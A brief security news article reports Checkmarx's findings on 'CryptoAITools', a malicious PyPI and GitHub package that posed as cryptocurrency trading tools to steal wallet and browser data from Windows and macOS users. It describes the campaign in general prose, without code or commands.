Checkmarx ‘s research team has uncovered a new invasive crypto malware campaign in the Python Package Index (PyPI) repository. Scammers are impersonating cryptocurrency trading tools to steal sensitive data and empty victims’ cryptocurrency wallets.
Findings revealed that a malicious package named “CryptoAITools” was uploaded to PyPI and GitHub repositories, impersonating legitimate cryptocurrency trading tools.
The attacker used a fake graphical user interface (GUI) to distract victims while the malware performed malicious actions. In addition, the malware automatically activated itself after installation, attacking both Windows and macOS operating systems.
“The CryptoAITools malware uses a sophisticated multi-step infection process, using a fake website to deliver its secondary payloads. After the initial infection via the PyPI package, the malware starts executing scripts separately for macOS and Windows systems.
“These scripts are responsible for downloading additional malicious components from the fake site,” – wrote the research team.
Checkmarx researcher Yehuda Gelb said in an analysis published earlier this month that the attacker targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus and other well-known cryptocurrency wallets.
“Presenting themselves as tools for mining mnemonic phrases and decrypting wallet data, these packages appeared to offer valuable functionality for cryptocurrency users involved in recovery or wallet management.”
In addition, the CryptoAITools malware conducted an extensive data theft operation, attacking browser data such as saved passwords and browsing history. On macOS systems, the malware also attacked data from Apple Notes and Stickies applications.
The attackers began by harvesting data stored in users’ home folders. The exfiltration script for each file changes, and the malware uploads the file to gofile.io using their API.
The attacker then sends the infected download link via the Telegram bot, using various tactics to lure potential victims.
“Our further investigation into this campaign revealed that the attacker used multiple infection vectors and social engineering tactics,” – the team noted. “The attack is not limited to the malicious Python package on PyPI, but extends to other platforms and methods.”
The CryptoAITools malware campaign has serious consequences for victims and the broader cryptocurrency community, including immediate financial losses. The impact also includes long-term identity theft and privacy risks.